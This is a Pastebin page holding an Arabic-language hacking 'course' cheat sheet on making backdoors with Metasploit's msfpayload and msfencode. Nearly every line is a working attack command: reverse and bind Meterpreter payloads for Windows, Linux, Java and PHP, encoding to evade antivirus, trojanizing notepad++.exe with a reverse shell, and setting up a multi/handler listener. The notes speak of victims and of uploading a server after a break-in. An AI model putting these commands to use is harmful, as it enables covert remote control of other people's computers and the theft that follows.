Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- :: Hackshow Professional Network ::
- Course : Backtrack
- by : Hacker Fantome195
- Backdoor صناعة الباكدور
- java / php / exe / perl /ruby...
- مستلزمات : بورت مفتوح في حالة اتصال عكسي
- تبيت الضحايا : ايبي ضحية وايبي تبعك يجب ان يكونان مثبتين او بعد اختراق ترفع سرفر ﻻي برنامج اختراق
- -----------------------------------------------------------------------------------------------
- msfpayload -l
- معرفة الخيارت الخاصة بكل بايلود
- msfpayload windows/shell_bind_tcp O
- ----------------------------------------------windows backdoor---------------------------------------
- بابلود يعتمد على اتصال عكسي
- msfpayload windows/meterpreter/reverse_tcp lhost= lport= X > back.exe
- اتصال مباشر
- msfpayload windows/meterpreter/bind_tcp lport= X > back.exe
- -----------------------------------------------------------------------------------------------------------------
- تنصت على الهدف في حالة بايلود perl / ruby /php
- nc ip port
- -----------------------------------------------------------------------------------------------------
- مرحلة التشفير
- msfencode -l
- امر التشفير في الميتا او في كونسول
- msfencode -t exe -x back.exe -o back_crypt.exe -e x86/shikata_ga_nai -c 3
- حقن الباكدور في ملف exe مع تشفيروا
- msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.191 LPORT=443 R | msfencode -t exe -x notepad++.exe -o notepad++_crypt.exe -e x86/shikata_ga_nai -c 3
- ----------------------------Linux backdoor----------------------------------------------------------
- msfpayload linux/x86/meterpreter/bind_tcp LPORT=80 R | msfencode -t elf > linux_meterpreter
- chmod u+x linux_meterpreter
- ./linux_meterpreter
- --------------------java backdoor--------------------------------------------------------------------
- ./msfpayload java/meterpreter/reverse_tcp LHOST= LPORT= J > back.jar
- ./msfpayload java/meterpreter/bind_tcp LPORT= J > back.jar
- -------------------------------------php Backdoor----------------------------------------------------
- msfpayload php/meterpreter/reverse_tcp LHOST= LPORT= R > back.php
- شفره ب base 64 بنفسك
- الأن طريقة ربط اتصال مع الهدف
- msfconsole
- use exploit/multi/handler
- use multi/handler
- set PAYLOAD البايلود الذي وضعت
- set LPORT البورت
- set RHOST [ايبي الهدف ]
- copyright 2013-2014
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement